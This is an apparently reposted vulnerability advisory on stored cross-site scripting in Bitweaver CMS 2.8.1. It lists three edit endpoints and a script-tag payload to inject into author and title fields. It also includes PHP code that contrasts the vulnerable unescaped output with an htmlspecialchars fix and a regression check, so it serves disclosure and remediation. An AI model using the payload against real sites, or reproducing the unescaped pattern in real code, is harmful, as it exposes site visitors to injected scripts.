Bitweaver CMS 2.8.1 Cross Site Scripting

2012.06.22
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

TITLE: Bitweaver CMS Multiple stored XSS
Vendor: Bitweaver CMS
Author: $1l3n7 @$$@$$17
Email: sil3ntb0t@gmail.com
Download Link: https://sourceforge.net/projects/bitweaver/files/bitweaver2.x/bitweaver2.8.1.zip/download
Versions: 2.8.1
Tested on: Windows7

------------------------------------------------------------------------------

Description:

Bitweaver is an application framework for content management. It is a fully functional web application and CMS. It is truly open source, community driven, object oriented, and written in PHP. It uses Smarty templates and ADOdb to support many databases, including Postgres, Firebird, Oracle, and MySQL.

DEMO:

A) Persistent XSS

Rendered at: http://localhost/bitweaver/articles/index.php

1: http://localhost/bitweaver/articles/edit.php
   In the Author Name field, POST DATA = "'-->><script>alert(0)</script>

2: http://localhost/bitweaver/pigeonholes/edit_pigeonholes.php?action=create
   In the Title field, POST DATA = "'-->><script>alert(0)</script>

3: http://localhost/bitweaver/events/edit.php
   In the Title field, POST DATA = "'-->><script>alert(0)</script>

------------------------------------------------------------------------------

gr33t1ngs and ShOuTZ to r007k17-w and all my friends..
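The three findings above share one root cause: a stored field (author name, title) written back into HTML without output encoding. The following is an added example, not Bitweaver's own code, showing that vulnerable pattern beside the contextual-encoding fix, exercised with the payload quoted in the advisory; the function names and markup are constructed for illustration.

```php
<?php
// Added example (not Bitweaver's code). Function names and markup are
// constructed; only the payload string comes from the advisory.

// Constructed sample input: the advisory's payload as it would sit in the
// database after being POSTed to the Author Name or Title field.
const ADVISORY_PAYLOAD = "\"'-->><script>alert(0)</script>";

// Vulnerable pattern: a stored field concatenated straight into HTML, so the
// browser parses attacker-supplied tags whenever the page is viewed (stored XSS).
function render_author_vulnerable(string $author): string
{
    return '<p class="author">By ' . $author . '</p>';
}

// Output encoding for HTML body and quoted-attribute contexts. ENT_QUOTES
// escapes both " and ', so the same helper is safe inside value="..." too.
function esc_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_author_safe(string $author): string
{
    return '<p class="author">By ' . esc_html($author) . '</p>';
}

// The same stored field echoed back into an edit form's title input.
function render_title_input_safe(string $title): string
{
    return '<input type="text" name="title" value="' . esc_html($title) . '">';
}

// Regression check for a test suite: rendered markup must not contain a raw
// <script tag nor the untrusted value verbatim (which would carry its quotes).
function contains_raw_markup(string $html, string $untrusted): bool
{
    return stripos($html, '<script') !== false
        || strpos($html, $untrusted) !== false;
}

$vuln  = render_author_vulnerable(ADVISORY_PAYLOAD);
$safe  = render_author_safe(ADVISORY_PAYLOAD);
$input = render_title_input_safe(ADVISORY_PAYLOAD);

echo $vuln, PHP_EOL, $safe, PHP_EOL, $input, PHP_EOL;
var_dump(contains_raw_markup($vuln, ADVISORY_PAYLOAD));
var_dump(contains_raw_markup($safe, ADVISORY_PAYLOAD));
var_dump(contains_raw_markup($input, ADVISORY_PAYLOAD));
```

In a Smarty template the equivalent fix is applying the built-in escape modifier to every stored field at the point of output rather than relying on input filtering alone.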

References:

https://sourceforge.net/projects/bitweaver/files/bitweaver2.x/bitweaver2.8.1.zip/download


Copyright 2024, cxsecurity.com